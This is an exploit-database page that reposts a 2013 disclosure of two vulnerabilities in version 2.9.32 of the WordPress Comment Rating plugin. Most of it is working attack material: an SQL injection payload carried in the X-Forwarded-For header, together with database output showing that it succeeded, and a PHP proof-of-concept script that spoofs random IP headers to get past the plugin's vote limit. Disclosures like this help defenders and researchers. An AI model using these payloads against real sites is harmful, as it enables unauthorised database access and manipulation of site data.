Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities

🗓️ 27 Feb 2013 00:00:00Reported by ebanyuType 
zdt
 zdt🔗 0day.today👁 20 Views

Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities. SQL injection, vote limitation bypass exploi

Code
# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
 
 
 
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
 
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }
 
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";
 
 
So let's take a look in the DB
 
mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)
 
 
Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:
 
GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive
 
 
And the result is:
 
mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | [email protected] |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)
 
Cheers
 
=======================================================================================
 
 
# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
 
 
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
 
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }
 
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";
 
 
Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.
 
A simple POC is made in php.
 
<?PHP
 
define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
for($i=0;$i<1;$i++) lvlup();
 
function lvlup(){
    global $url;
    $header = "GET ".URL." HTTP/1.1 \r\n";
    $header.= "Host: ".$url['host']."\r\n";
    $header.= "Accept-Encoding: gzip, deflate \r\n";
    $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
    $header.= "Connection: close \r\n\r\n";
    $socket  = socket_create(AF_INET, SOCK_STREAM,  SOL_TCP);
    socket_connect($socket,$url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}
 
?>

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Feb 2013 00:00Current
7.1High risk
Vulners AI Score7.1
wordpresscomment rating pluginvulnerabilitiessql injectionbypasshttp_x_forwarded_forupdatephp 5.4mysql 5.5
20